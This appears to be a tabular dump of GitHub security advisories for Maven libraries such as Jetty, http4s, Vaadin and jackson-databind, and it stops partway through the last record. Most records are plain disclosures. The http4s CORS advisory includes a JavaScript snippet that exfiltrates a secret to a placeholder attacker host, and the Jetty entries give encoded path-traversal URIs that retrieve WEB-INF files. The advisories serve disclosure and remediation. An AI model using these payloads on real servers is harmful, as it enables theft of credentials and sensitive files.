ecosystem stringclasses 14 values | vuln_id stringlengths 10 19 | summary stringlengths 4 267 ⌀ | details stringlengths 9 13.5k | aliases stringlengths 17 144 ⌀ | modified_date stringdate 2010-05-27 05:47:00 2022-05-10 08:46:52 | published_date stringdate 2005-12-31 05:00:00 2022-05-10 08:46:50 | severity stringclasses 5 values | score float64 0 10 ⌀ | cwe_id stringclasses 988 values | refs stringlengths 30 17.7k ⌀ | introduced stringlengths 75 4.26k ⌀ |
|---|---|---|---|---|---|---|---|---|---|---|---|
Maven | GHSA-xgxp-9x8p-gcw4 | SQL Injection | A flaw was found in PostgreSQL versions before 13.1, before 12.5, before 11.10, before 10.15, before 9.6.20 and before 9.5.24. An attacker having permission to create non-temporary objects in at least one schema can execute arbitrary SQL functions under the identity of a superuser. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability. | {'CVE-2020-25695'} | 2022-04-15T19:47:53.539887Z | 2022-02-15T01:57:18Z | HIGH | null | {'CWE-89'} | {'https://nvd.nist.gov/vuln/detail/CVE-2020-25695', 'https://security.gentoo.org/glsa/202012-07', 'https://bugzilla.redhat.com/show_bug.cgi?id=1894425', 'https://lists.debian.org/debian-lts-announce/2020/12/msg00005.html', 'https://security.netapp.com/advisory/ntap-20201202-0003/', 'https://www.postgresql.org/support/security/'} | null |
Maven | GHSA-93g4-3phc-g4xw | SQL injection in Apache DolphinScheduler | In Apache DolphinScheduler before 1.3.6 versions, authorized users can use SQL injection in the data source center. (Only applicable to MySQL data source with internal login account password) | {'CVE-2021-27644'} | 2022-03-03T05:11:32.413456Z | 2021-11-03T17:30:18Z | HIGH | null | {'CWE-89'} | {'https://lists.apache.org/thread.html/r35d6acf021486a390a7ea09e6650c2fe19e72522bd484791d606a6e6%40%3Cdev.dolphinscheduler.apache.org%3E', 'http://www.openwall.com/lists/oss-security/2021/11/01/3', 'https://lists.apache.org/thread.html/r35d6acf021486a390a7ea09e6650c2fe19e72522bd484791d606a6e6@%3Cdev.dolphinscheduler.apache.org%3E', 'https://nvd.nist.gov/vuln/detail/CVE-2021-27644'} | null |
Maven | GHSA-c99r-67x4-whj6 | Reflected cross-site scripting in development mode handler in Vaadin 14, 15-19 | URL encoding error in development mode handler in `com.vaadin:flow-server` versions 2.0.0 through 2.6.1 (Vaadin 14.0.0 through 14.6.1), 3.0.0 through 6.0.9 (Vaadin 15.0.0 through 19.0.8) allows local user to execute arbitrary JavaScript code by opening crafted URL in browser.
- https://vaadin.com/security/cve-2021-33604 | {'CVE-2021-33604'} | 2022-03-03T05:12:54.251453Z | 2021-06-28T16:56:07Z | LOW | null | {'CWE-172'} | {'https://vaadin.com/security/cve-2021-33604', 'https://nvd.nist.gov/vuln/detail/CVE-2021-33604', 'https://github.com/vaadin/platform/security/advisories/GHSA-c99r-67x4-whj6', 'https://github.com/vaadin/flow/', 'https://github.com/vaadin/flow/pull/11099'} | null |
Maven | GHSA-jmx8-355m-8vwh | Unauthorized client-side property update in UIDL request handler in Vaadin 10 and 11 | Missing check in UIDL request handler in com.vaadin:flow-server versions 1.0.0 through 1.0.5 (Vaadin 10.0.0 through 10.0.7, and 11.0.0 through 11.0.2) allows attacker to update element property values via crafted synchronization message.
- https://vaadin.com/security/cve-2018-25007 | {'CVE-2018-25007'} | 2022-03-03T05:14:14.615811Z | 2021-04-19T14:53:09Z | LOW | null | {'CWE-754'} | {'https://github.com/vaadin/flow/security/advisories/GHSA-jmx8-355m-8vwh', 'https://nvd.nist.gov/vuln/detail/CVE-2018-25007', 'https://vaadin.com/security/cve-2018-25007', 'https://github.com/vaadin/flow/pull/4774'} | null |
Maven | GHSA-qfjv-998w-q48f | High severity vulnerability that affects org.apache.syncope:syncope-core | An administrator with workflow definition entitlements can use DTD to perform malicious operations, including but not limited to file read, file write, and code execution. | {'CVE-2018-17186'} | 2022-03-03T05:14:16.118208Z | 2018-11-06T23:15:46Z | HIGH | null | {'CWE-611'} | {'https://github.com/advisories/GHSA-qfjv-998w-q48f', 'https://nvd.nist.gov/vuln/detail/CVE-2018-17186', 'https://syncope.apache.org/security#CVE-2018-17186:_XXE_on_BPMN_definitions'} | null |
Maven | GHSA-g6v7-vqhx-6v6c | XML External Entity Reference in org.opencms:opencms-core | An XML external entity (XXE) vulnerability in Alkacon OpenCms 11.0, 11.0.1 and 11.0.2 allows remote authenticated users with edit privileges to exfiltrate files from the server's file system by uploading a crafted SVG document. | {'CVE-2021-3312'} | 2022-03-03T05:12:54.278811Z | 2021-10-12T17:23:40Z | MODERATE | null | {'CWE-611'} | {'https://github.com/alkacon/opencms-core', 'https://github.com/alkacon/opencms-core/issues/721', 'https://github.com/alkacon/opencms-core/issues/725', 'https://github.com/alkacon/opencms-core/releases', 'https://nvd.nist.gov/vuln/detail/CVE-2021-3312', 'https://github.com/alkacon/opencms-core/commit/92e035423aa6967822d343e54392d4291648c0ee'} | null |
Maven | GHSA-gwcr-j4wh-j3cq | Jetty Utility Servlets ConcatServlet Double Decoding Information Disclosure Vulnerability | Requests to the `ConcatServlet` and `WelcomeFilter` are able to access protected resources within the `WEB-INF` directory. For example a request to the `ConcatServlet` with a URI of `/concat?/%2557EB-INF/web.xml` can retrieve the web.xml file. This can reveal sensitive information regarding the implementation of a web application.
This occurs because both `ConcatServlet` and `WelcomeFilter` decode the supplied path to verify it is not within the `WEB-INF` or `META-INF` directories. It then uses this decoded path to call `RequestDispatcher` which will also do decoding of the path. This double decoding allows paths with a doubly encoded `WEB-INF` to bypass this security check.
### Impact
This affects all versions of `ConcatServlet` and `WelcomeFilter` in versions before 9.4.41, 10.0.3 and 11.0.3.
### Workarounds
If you cannot update to the latest version of Jetty, you can instead deploy your own version of the [`ConcatServlet`](https://github.com/eclipse/jetty.project/blob/4204526d2fdad355e233f6bf18a44bfe028ee00b/jetty-servlets/src/main/java/org/eclipse/jetty/servlets/ConcatServlet.java) and/or the [`WelcomeFilter`](https://github.com/eclipse/jetty.project/blob/4204526d2fdad355e233f6bf18a44bfe028ee00b/jetty-servlets/src/main/java/org/eclipse/jetty/servlets/WelcomeFilter.java) by using the code from the latest version of Jetty.
| {'CVE-2021-28169'} | 2022-04-22T16:02:00.363425Z | 2021-06-10T15:43:22Z | MODERATE | null | {'CWE-200'} | {'https://lists.apache.org/thread.html/r234f6452297065636356f43654cdacef565b8f9ceb0e0c07ffb8c73b@%3Cdev.kafka.apache.org%3E', 'https://www.oracle.com/security-alerts/cpujan2022.html', 'https://lists.apache.org/thread.html/r2721aba31a8562639c4b937150897e24f78f747cdbda8641c0f659fe@%3Cusers.kafka.apache.org%3E', 'https://lists.apache.org/thread.html/r04a4b4553a23aff26f42635a6ae388c3b162aab30a88d12e59d05168@%3Cjira.kafka.apache.org%3E', 'https://lists.apache.org/thread.html/r33eb06b05afbc7df28d31055cae0cb3fd36cab808c884bf6d680bea5@%3Cdev.zookeeper.apache.org%3E', 'https://lists.debian.org/debian-lts-announce/2021/06/msg00017.html', 'https://lists.apache.org/thread.html/ref1c161a1621504e673f9197b49e6efe5a33ce3f0e6d8f1f804fc695@%3Cjira.kafka.apache.org%3E', 'https://lists.apache.org/thread.html/rbefa055282d52d6b58d29a79fbb0be65ab0a38d25f00bd29eaf5e6fd@%3Cnotifications.zookeeper.apache.org%3E', 'https://lists.apache.org/thread.html/rf36f1114e84a3379b20587063686148e2d5a39abc0b8a66ff2a9087a@%3Cissues.zookeeper.apache.org%3E', 'https://security.netapp.com/advisory/ntap-20210727-0009/', 'https://lists.apache.org/thread.html/r284de9c5399486dfff12ab9e7323ca720dd7019a9a3e11c8510a7140@%3Cjira.kafka.apache.org%3E', 'https://lists.apache.org/thread.html/r91e34ff61aff8fd25a3f2a21539597c6ef7589a31c199b0a9546477c@%3Cjira.kafka.apache.org%3E', 'https://nvd.nist.gov/vuln/detail/CVE-2021-28169', 'https://github.com/eclipse/jetty.project/security/advisories/GHSA-gwcr-j4wh-j3cq', 'https://www.oracle.com/security-alerts/cpuapr2022.html', 'https://lists.apache.org/thread.html/rfff6ff8ffb31e8a32619c79774def44b6ffbb037c128c5ad3eab7171@%3Cissues.zookeeper.apache.org%3E', 'https://lists.apache.org/thread.html/r32b0b640ad2be3b858f0af51c68a7d5c5a66a462c8bbb93699825cd3@%3Cissues.zookeeper.apache.org%3E', 'https://lists.apache.org/thread.html/rd5b52362f5edf98e0dcab6541a381f571cccc05ad9188e793af688f3@%3Cjira.kafka.apache.org%3E', 'https://lists.apache.org/thread.html/r8a1a332899a1f92c8118b0895b144b27a78e3f25b9d58a34dd5eb084@%3Cnotifications.zookeeper.apache.org%3E', 'https://www.debian.org/security/2021/dsa-4949', 'https://lists.apache.org/thread.html/r29678972c3f8164b151fd7a5802785d402e530c09870a82ffc7681a4@%3Cdev.kafka.apache.org%3E', 'https://lists.apache.org/thread.html/rddbb4f8d5db23265bb63d14ef4b3723b438abc1589f877db11d35450@%3Cissues.zookeeper.apache.org%3E', 'https://www.oracle.com/security-alerts/cpuoct2021.html', 'https://lists.apache.org/thread.html/r67c4f90658fde875521c949448c54c98517beecdc7f618f902c620ec@%3Cissues.zookeeper.apache.org%3E', 'https://lists.apache.org/thread.html/rb1292d30462b9baedea7c5d9594fc75990d9aa0ec223b48054ca9c25@%3Cjira.kafka.apache.org%3E', 'https://github.com/eclipse/jetty.project'} | null |
Maven | GHSA-52cf-226f-rhr6 | Default CORS config allows any origin with credentials | ### Impact
#### Origin reflection attack
The default CORS configuration is vulnerable to an origin reflection attack. Take the following http4s app `app`, using the default CORS config, running at https://vulnerable.example.com:
```scala
val routes: HttpRoutes[F] = HttpRoutes.of {
case req if req.pathInfo === "/secret" =>
Response(Ok).withEntity(password).pure[F]
}
val app = CORS(routes.orNotFound)
```
The following request is made to our server:
```http
GET /secret HTTP/1.1
Host: vulnerable.example.com
Origin: https://adversary.example.net
Cookie: sessionId=...
```
When the `anyOrigin` flag of `CORSConfig` is `true`, as is the case in the default argument to `CORS`, the middleware will allow sharing its resource regardless of the `allowedOrigins` setting. Paired with the default `allowCredentials`, the server approves sharing responses that may have required credentials for sensitive information with any origin:
```http
HTTP/1.1 200 OK
Access-Control-Allow-Origin: https://adversary.example.org
Access-Control-Allow-Credentials: true
Content-Type: text/plain
p4ssw0rd
```
A malicious script running on `https://adversary.example.org/` can then exfiltrate sensitive information with the user's credentials to `vulnerable.exmaple.org`:
```javascript
var req = new XMLHttpRequest();
req.onload = reqListener;
req.open('get','https://vulnerable.example.org/secret',true);
req.withCredentials = true;
req.send();
function reqListener() {
location='//bad-people.example.org/log?key='+this.responseText;
};
```
#### Null origin attack
The middleware is also susceptible to a Null Origin Attack. A user agent may send `Origin: null` when a request is made from a sandboxed iframe. The CORS-wrapped http4s app will respond with `Access-Control-Allow-Origin: null`, permitting a similar exfiltration of secrets to the above.
### Patches
The problem is fixed in 0.21.27, 0.22.3, 0.23.2, and 1.0.0-M25. The original `CORS` implementation and `CORSConfig` are deprecated. In addition to the origin vulnerability, the following deficiencies in the deprecated version are fixed in the new signatures:
### Migration
The `CORS` object exposes a default `CORSPolicy` via `CORS.policy`. This can be configured with various `with*` methods, like any http4s builder. Finally, the `CORSPolicy` may be applied to any `Http`, like any other http4s middleware:
```scala
val routes: HttpRoutes[F] = ???
val cors = CORS.policy
.withAllowOriginAll
.withAllowCredentials(false)
.apply(routes)
```
### Workarounds
It is possible to be safe in unpatched versions, but note the following defects exist:
* The `anyMethod` flag, enabled by default, accepts methods that cannot be enumerated in the `Access-Control-Allow-Methods` preflight response.
* Rejected CORS requests receive a `403` response, when the client should be the enforcement point. The server should just omit all CORS response headers.
* Does not send `Vary: Access-Control-Request-Headers` on preflight requests. This may confuse caches.
* Does not validate the `Access-Control-Request-Headers` of a preflight request. This validation is not mandated by the Fetch standard, but is typical of most server implementations.
* Needlessly sends `Vary: Access-Control-Request-Method` on non-preflight requests. This should be harmless in practice.
* Needlessly sends `Access-Control-Max-Age` header on non-preflight requests. This should be harmless in practice.
* Sends an invalid `Access-Control-Allow-Credentials: false` instead of omitting the header. This should be harmless in practice.
#### Explicit origins
In versions before the patch, set `anyOrigin` to `false`, and then specifically include trusted origins in `allowedOrigins`.
##### 0.21.x
```scala
val routes: HttpRoutes[F] = ???
val config = CORS.DefaultConfig.copy(
anyOrigin = false,
allowOrigins = Set("http://trusted.example.com")
)
val cors = CORS(routes, config)
```
###### 0.22.x, 0.23.x, 1.x
```scala
val routes: HttpRoutes[F] = ???
val config = CORSConfig.default
.withAnyOrigin(false)
.withAllowedOrigins(Set("http://trusted.example.com"))
val cors = CORS(routes, config)
```
#### Disable credentials
Alternatively, sharing responses tainted by credentials can be deprecated.
##### 0.21.x
```scala
val routes: HttpRoutes[F] = ???
val config = CORS.DefaultConfig.copy(allowCredentials = false)
val cors = CORS(routes, config)
```
##### 0.22.x, 0.23.x, 1.x
```scala
val routes: HttpRoutes[F] = ???
val config = CORSConfig.default.withAllowedCredentials(false)
val cors = CORS(routes, config)
```
### References
* The [MDN guide to CORS](https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS)
* [PayloadsAllTheThings CORS misconfiguration](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/6cba7ceda93c3f64559c3e73881c21076536e5fb/CORS%20Misconfiguration/README.md)
### For more information
If you have any questions or comments about this advisory:
* Open an issue in [GitHub](http://github.com/http4s/http4s)
* Contact us via the [http4s security policy](https://github.com/http4s/http4s/security/policy) | {'CVE-2021-39185'} | 2021-09-02T18:55:34Z | 2021-09-02T16:52:18Z | CRITICAL | null | {'CWE-346'} | {'https://nvd.nist.gov/vuln/detail/CVE-2021-39185', 'https://github.com/http4s/http4s/releases/tag/v0.23.2', 'https://github.com/http4s/http4s/security/advisories/GHSA-52cf-226f-rhr6', 'https://github.com/http4s/http4s'} | null |
Maven | GHSA-jwgx-9mmh-684w | Credential exposure through log files in Undertow | A vulnerability was found in Undertow web server before 2.0.21. An information exposure of plain text credentials through log files because Connectors.executeRootHandler:402 logs the HttpServerExchange object at ERROR level using UndertowLogger.REQUEST_LOGGER.undertowRequestFailed(t, exchange) | {'CVE-2019-3888'} | 2022-03-03T05:13:32.343780Z | 2019-06-13T20:02:56Z | CRITICAL | null | {'CWE-532'} | {'https://nvd.nist.gov/vuln/detail/CVE-2019-3888', 'https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-3888', 'https://access.redhat.com/errata/RHSA-2019:2998', 'http://www.securityfocus.com/bid/108739', 'https://access.redhat.com/errata/RHSA-2019:2439', 'https://access.redhat.com/errata/RHSA-2020:0727', 'https://security.netapp.com/advisory/ntap-20220210-0019/'} | null |
Maven | GHSA-mr95-9rr4-668f | High severity vulnerability that affects com.typesafe.akka:akka-actor_2.11 and com.typesafe.akka:akka-actor_2.12 | Lightbend Akka 2.5.x before 2.5.16 allows message disclosure and modification because of an RNG error. A random number generator is used in Akka Remoting for TLS (both classic and Artery Remoting). Akka allows configuration of custom random number generators. For historical reasons, Akka included the AES128CounterSecureRNG and AES256CounterSecureRNG random number generators. The implementations had a bug that caused the generated numbers to be repeated after only a few bytes. The custom RNG implementations were not configured by default but examples in the documentation showed (and therefore implicitly recommended) using the custom ones. This can be used by an attacker to compromise the communication if these random number generators are enabled in configuration. It would be possible to eavesdrop, replay, or modify the messages sent with Akka Remoting/Cluster. | {'CVE-2018-16115'} | 2022-03-03T05:13:12.970210Z | 2018-10-22T20:44:26Z | CRITICAL | null | {'CWE-338'} | {'https://nvd.nist.gov/vuln/detail/CVE-2018-16115', 'https://github.com/advisories/GHSA-mr95-9rr4-668f', 'https://doc.akka.io/docs/akka/current/security/2018-08-29-aes-rng.html'} | null |
Maven | GHSA-rfmp-jvr7-hx78 | Inadequate Encryption Strength in Apache NiFi | In Apache NiFi 1.2.0 to 1.11.4, the NiFi UI and API were protected by mandating TLS v1.2, as well as listening connections established by processors like ListenHTTP, HandleHttpRequest, etc. However intracluster communication such as cluster request replication, Site-to-Site, and load balanced queues continued to support TLS v1.0 or v1.1. | {'CVE-2020-9491'} | 2022-04-29T20:33:29.094673Z | 2022-01-06T20:41:06Z | HIGH | null | {'CWE-327'} | {'https://lists.apache.org/thread.html/r2d9c21f9ec35d66f2bb42f8abe876dabd786166b6284e9a33582c718@%3Ccommits.nifi.apache.org%3E', 'https://nvd.nist.gov/vuln/detail/CVE-2020-9491', 'https://github.com/apache/nifi', 'https://lists.apache.org/thread.html/re48582efe2ac973f8cff55c8b346825cb491c71935e15ab2d61ef3bf@%3Ccommits.nifi.apache.org%3E', 'https://nifi.apache.org/security#CVE-2020-9491', 'https://github.com/apache/nifi/commit/441781cec50f77d9f1e65093f55bbd614b8c5ec6'} | null |
Maven | GHSA-5hv6-mh8q-q9v8 | RCE in XWiki | ### Impact
Any user with SCRIPT right (EDIT right before XWiki 7.4) can gain access to the application server Servlet context which contains tools allowing to instantiate arbitrary Java objects and invoke methods that may lead to arbitrary code execution.
### Patches
It has been patched in both version XWiki 12.5 and XWiki 11.10.6.
### Workarounds
The only workaround is to give SCRIPT right only to trusted users.
### References
https://jira.xwiki.org/browse/XWIKI-17423
It's been reported by the GitHub Security Lab under https://jira.xwiki.org/browse/XWIKI-17141.
### For more information
If you have any questions or comments about this advisory:
* Open an issue in [Jira XWiki](https://jira.xwiki.org)
* Email us at [our security mailing list](mailto:security@xwiki.org) | {'CVE-2020-15252'} | 2021-11-19T14:41:16Z | 2020-10-16T16:55:49Z | HIGH | null | {'CWE-74', 'CWE-94'} | {'https://nvd.nist.gov/vuln/detail/CVE-2020-15252', 'https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-5hv6-mh8q-q9v8', 'https://github.com/xwiki/xwiki-platform', 'https://jira.xwiki.org/browse/XWIKI-17141', 'https://jira.xwiki.org/browse/XWIKI-17423'} | null |
Maven | GHSA-vgg8-72f2-qm23 | Critical severity vulnerability that affects org.eclipse.jetty:jetty-server | In Eclipse Jetty, versions 9.2.x and older, 9.3.x, transfer-encoding chunks are handled poorly. The chunk length parsing was vulnerable to an integer overflow. Thus a large chunk size could be interpreted as a smaller chunk size and content sent as chunk body could be interpreted as a pipelined request. If Jetty was deployed behind an intermediary that imposed some authorization and that intermediary allowed arbitrarily large chunks to be passed on unchanged, then this flaw could be used to bypass the authorization imposed by the intermediary as the fake pipelined request would not be interpreted by the intermediary as a request. | {'CVE-2017-7657'} | 2022-03-03T05:14:14.796288Z | 2018-10-19T16:15:34Z | CRITICAL | null | {'CWE-444', 'CWE-190'} | {'https://bugs.eclipse.org/bugs/show_bug.cgi?id=535668', 'https://lists.apache.org/thread.html/708d94141126eac03011144a971a6411fcac16d9c248d1d535a39451@%3Csolr-user.lucene.apache.org%3E', 'https://security.netapp.com/advisory/ntap-20181014-0001/', 'https://support.hpe.com/hpsc/doc/public/display?docLocale=en_US&docId=emr_na-hpesbst03953en_us', 'https://github.com/advisories/GHSA-vgg8-72f2-qm23', 'https://nvd.nist.gov/vuln/detail/CVE-2017-7657', 'https://lists.apache.org/thread.html/053d9ce4d579b02203db18545fee5e33f35f2932885459b74d1e4272@%3Cissues.activemq.apache.org%3E', 'https://lists.apache.org/thread.html/9317fd092b257a0815434b116a8af8daea6e920b6673f4fd5583d5fe@%3Ccommits.druid.apache.org%3E', 'https://lists.apache.org/thread.html/r9159c9e7ec9eac1613da2dbaddbc15691a13d4dbb2c8be974f42e6ae@%3Ccommits.druid.apache.org%3E', 'http://www.securitytracker.com/id/1041194', 'https://lists.apache.org/thread.html/r41af10c4adec8d34a969abeb07fd0d6ad0c86768b751464f1cdd23e8@%3Ccommits.druid.apache.org%3E', 'https://access.redhat.com/errata/RHSA-2019:0910', 'https://lists.apache.org/thread.html/r1b103833cb5bc8466e24ff0ecc5e75b45a705334ab6a444e64e840a0@%3Cissues.bookkeeper.apache.org%3E', 'https://www.oracle.com/security-alerts/cpuoct2020.html', 'https://www.debian.org/security/2018/dsa-4278', 'https://lists.apache.org/thread.html/ra6f956ed4ec2855583b2d0c8b4802b450f593d37b77509b48cd5d574@%3Ccommits.druid.apache.org%3E', 'https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html'} | null |
Maven | GHSA-4w82-r329-3q67 | Deserialization of Untrusted Data in jackson-databind | FasterXML jackson-databind 2.x before 2.6.7.4, 2.7.x before 2.7.9.7, 2.8.x before 2.8.11.5 and 2.9.x before 2.9.10.2 lacks certain xbean-reflect/JNDI blocking, as demonstrated by org.apache.xbean.propertyeditor.JndiConverter. | {'CVE-2020-8840'} | 2022-04-07T22:46:58.349234Z | 2020-03-04T20:52:14Z | CRITICAL | null | {'CWE-502'} | {'https://lists.apache.org/thread.html/r1efc776fc6ce3387593deaa94bbdd296733b1b01408a39c8d1ab9e0e@%3Cdev.ranger.apache.org%3E', 'https://lists.apache.org/thread.html/r7762d69e85c58d6948823424017ef4c08f47de077644277fa18cc116@%3Cdev.ranger.apache.org%3E', 'https://lists.apache.org/thread.html/r6fdd4c61a09a0c89f581b4ddb3dc6f154ab0c705fcfd0a7358b2e4e5@%3Cissues.zookeeper.apache.org%3E', 'http://www.huawei.com/en/psirt/security-advisories/huawei-sa-20200610-01-fastjason-en', 'https://lists.apache.org/thread.html/re7326b8655eab931f2a9ce074fd9a1a51b5db11456bee9b48e1e170c@%3Cissues.zookeeper.apache.org%3E', 'https://lists.apache.org/thread.html/r7e5c10534ed06bf805473ac85e8412fe3908a8fa4cabf5027bf11220@%3Cdev.kafka.apache.org%3E', 'https://security.netapp.com/advisory/ntap-20200327-0002/', 'https://lists.apache.org/thread.html/rb43f9a65150948a6bebd3cb77ee3e105d40db2820fd547528f4e7f89@%3Cissues.zookeeper.apache.org%3E', 'https://nvd.nist.gov/vuln/detail/CVE-2020-8840', 'https://github.com/FasterXML/jackson-databind', 'https://lists.apache.org/thread.html/rdea588d4a0ebf9cb7ce8c3a8f18d0d306507c4f8ba178dd3d20207b8@%3Cdev.tomee.apache.org%3E', 'https://github.com/FasterXML/jackson-databind/commit/74aba4042fce35ee0b91bd2847e788c10040d78b', 'https://lists.apache.org/thread.html/r2fa8046bd47fb407ca09b5107a80fa6147ba4ebe879caae5c98b7657@%3Cdev.ranger.apache.org%3E', 'https://lists.apache.org/thread.html/ra275f29615f35d5b40106d1582a41e5388b2a5131564e9e01a572987@%3Cdev.ranger.apache.org%3E', 'https://lists.apache.org/thread.html/r94930e39b60fff236160c1c4110fe884dc093044b067aa5fc98d7ee1@%3Cdev.ranger.apache.org%3E', 'https://lists.apache.org/thread.html/rb99c7321eba5d4c907beec46675d52827528b738cfafd48eb4d862f1@%3Cdev.tomee.apache.org%3E', 'https://lists.apache.org/thread.html/r3d20a2660b36551fd8257d479941782af4a7169582449fac1704bde2@%3Ccommits.druid.apache.org%3E', 'https://lists.apache.org/thread.html/rac5ee5d686818be7e7c430d35108ee01a88aae54f832d32f62431fd1@%3Cnotifications.zookeeper.apache.org%3E', 'https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2@%3Cissues.geode.apache.org%3E', 'https://www.oracle.com/security-alerts/cpuoct2020.html', 'https://lists.apache.org/thread.html/r46bebdeb59b8b7212d63a010ca445a9f5c4e9d64dcf693cab6f399d3@%3Ccommits.zookeeper.apache.org%3E', 'https://lists.apache.org/thread.html/rfc1ccfe89332155b72ce17f13a2701d3e7b9ec213324ceb90e79a28a@%3Cdev.ranger.apache.org%3E', 'https://www.oracle.com/security-alerts/cpuapr2020.html', 'https://lists.apache.org/thread.html/r8e96c340004b7898cad3204ea51280ef6e4b553a684e1452bf1b18b1@%3Cjira.kafka.apache.org%3E', 'https://lists.apache.org/thread.html/rc717fd6c65190f4e592345713f9ef0723fb7d71f624caa2a17caa26a@%3Cdev.ranger.apache.org%3E', 'https://lists.apache.org/thread.html/r446646c5588b10f5e02409ad580b12f314869009cdfbf844ca395cec@%3Cdev.ranger.apache.org%3E', 'https://lists.apache.org/thread.html/rb5eedf90ba3633e171a2ffdfe484651c9490dc5df74c8a29244cbc0e@%3Ccommits.zookeeper.apache.org%3E', 'https://lists.apache.org/thread.html/rdf8d389271a291dde3b2f99c36918d6cb1e796958af626cc140fee23@%3Ccommits.zookeeper.apache.org%3E', 'https://github.com/FasterXML/jackson-databind/issues/2620', 'https://lists.apache.org/thread.html/r1c09b9551f6953dbeca190a4c4b78198cdbb9825fce36f96fe3d8218@%3Cdev.tomee.apache.org%3E', 'https://lists.apache.org/thread.html/r3539bd3a377991217d724879d239e16e86001c54160076408574e1da@%3Cnotifications.zookeeper.apache.org%3E', 'https://github.com/FasterXML/jackson-databind/commit/9bb52c7122271df75435ec7e66ecf6b02b1ee14f', 'https://lists.apache.org/thread.html/r8170007fd9b263d65b37d92a7b5d7bc357aedbb113a32838bc4a9485@%3Cissues.zookeeper.apache.org%3E', 'https://lists.apache.org/thread.html/rb73708bf714ed6dbc1212da082e7703e586077f0c92f3940b2e82caf@%3Cdev.ranger.apache.org%3E', 'https://lists.apache.org/thread.html/r1b103833cb5bc8466e24ff0ecc5e75b45a705334ab6a444e64e840a0@%3Cissues.bookkeeper.apache.org%3E', 'https://lists.apache.org/thread.html/rf28ab6f224b48452afd567dfffb705fbda0fdbbf6535f6bc69d47e91@%3Cdev.ranger.apache.org%3E', 'https://lists.apache.org/thread.html/r428d068b2a4923f1a5a4f5fc6381b95205cfe7620169d16db78e9c71@%3Cnotifications.zookeeper.apache.org%3E', 'https://lists.apache.org/thread.html/r5d8bea8e9d17b6efcf4a0e4e194e91ef46a99f505777a31a60da2b38@%3Cdev.ranger.apache.org%3E', 'https://lists.apache.org/thread.html/re8ae2670ec456ef1c5a2a661a2838ab2cd00e9efa1e88c069f546f21@%3Ccommits.zookeeper.apache.org%3E', 'https://lists.apache.org/thread.html/rcc72b497e3dff2dc62ec9b89ceb90bc4e1b14fc56c3c252a6fcbb013@%3Cdev.ranger.apache.org%3E', 'https://lists.apache.org/thread.html/rdf311f13e6356297e0ffe74397fdd25a3687b0a16e687c3ff5b834d8@%3Cdev.ranger.apache.org%3E', 'https://lists.apache.org/thread.html/r65ee95fa09c831843bac81eaa582fdddc2b6119912a72d1c83a9b882@%3Cissues.zookeeper.apache.org%3E', 'https://lists.apache.org/thread.html/r319f19c74e06c201b9d4e8b282a4e4b2da6dcda022fb46f007dd00d3@%3Ccommits.druid.apache.org%3E', 'https://lists.apache.org/thread.html/r9e59ebaf76fd00b2fa3ff5ebf18fe075ca9f4376216612c696f76718@%3Cdev.ranger.apache.org%3E', 'https://lists.debian.org/debian-lts-announce/2020/02/msg00020.html', 'https://github.com/FasterXML/jackson-databind/commit/914e7c9f2cb8ce66724bf26a72adc7e958992497', 'https://lists.apache.org/thread.html/rc068e824654c4b8bd4f2490bec869e29edbfcd5dfe02d47cbf7433b2@%3Cdev.tomee.apache.org%3E', 'https://lists.apache.org/thread.html/r9ecf211c22760b00967ebe158c6ed7dba9142078e2a630ab8904a5b7@%3Cdev.zookeeper.apache.org%3E', 'https://lists.apache.org/thread.html/r078e68a926ea6be12e8404e47f45aabf04bb4668e8265c0de41db6db@%3Ccommits.druid.apache.org%3E'} | null |
Maven | GHSA-f26x-pr96-vw86 | Moderate severity vulnerability that affects org.springframework:spring-core | Spring Framework, versions 5.0.x prior to 5.0.7 and 4.3.x prior to 4.3.18 and older unsupported versions, allows web applications to enable cross-domain requests via JSONP (JSON with Padding) through AbstractJsonpResponseBodyAdvice for REST controllers and MappingJackson2JsonView for browser requests. Both are not enabled by default in Spring Framework nor Spring Boot, however, when MappingJackson2JsonView is configured in an application, JSONP support is automatically ready to use through the "jsonp" and "callback" JSONP parameters, enabling cross-domain requests. | {'CVE-2018-11040'} | 2022-03-03T05:13:34.485137Z | 2018-10-16T17:43:45Z | MODERATE | null | {'CWE-829'} | {'https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html', 'https://github.com/advisories/GHSA-f26x-pr96-vw86', 'https://www.oracle.com/security-alerts/cpujul2020.html', 'https://pivotal.io/security/cve-2018-11040', 'https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html', 'https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html', 'https://nvd.nist.gov/vuln/detail/CVE-2018-11040', 'https://www.oracle.com/security-alerts/cpuoct2021.html', 'https://www.oracle.com/security-alerts/cpujan2020.html', 'http://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html', 'https://lists.debian.org/debian-lts-announce/2021/04/msg00022.html'} | null |
Maven | GHSA-v7ff-8wcx-gmc5 | Authorization Before Parsing and Canonicalization in jetty | Release 9.4.37 introduced a more precise implementation of [RFC3986](https://tools.ietf.org/html/rfc3986#section-3.3) with regards to URI decoding, together with some new compliance modes to optionally allow support of some URI that may have ambiguous interpretation within the Servlet specified API methods behaviours. The default mode allowed % encoded . characters to be excluded for URI normalisation, which is correct by the RFC, but is not assumed by common Servlet implementations. The default compliance mode allows requests with URIs that contain `%2e` or `%2e%2e` segments to access protected resources within the `WEB-INF` directory. For example a request to `/context/%2e/WEB-INF/web.xml` can retrieve the `web.xml` file. This can reveal sensitive information regarding the implementation of a web application. Workarounds found by HttpCompliance mode RFC7230_NO_AMBIGUOUS_URIS can be enabled by updating `start.d/http.ini` to include: jetty.http.compliance=RFC7230_NO_AMBIGUOUS_URIS. | {'CVE-2021-28164'} | 2022-04-22T16:02:00.048689Z | 2021-04-06T17:31:01Z | MODERATE | null | {'CWE-863', 'CWE-551', 'CWE-200'} | {'https://lists.apache.org/thread.html/r2ea2f0541121f17e470a0184843720046c59d4bde6d42bf5ca6fad81@%3Cissues.solr.apache.org%3E', 'https://www.oracle.com/security-alerts/cpujan2022.html', 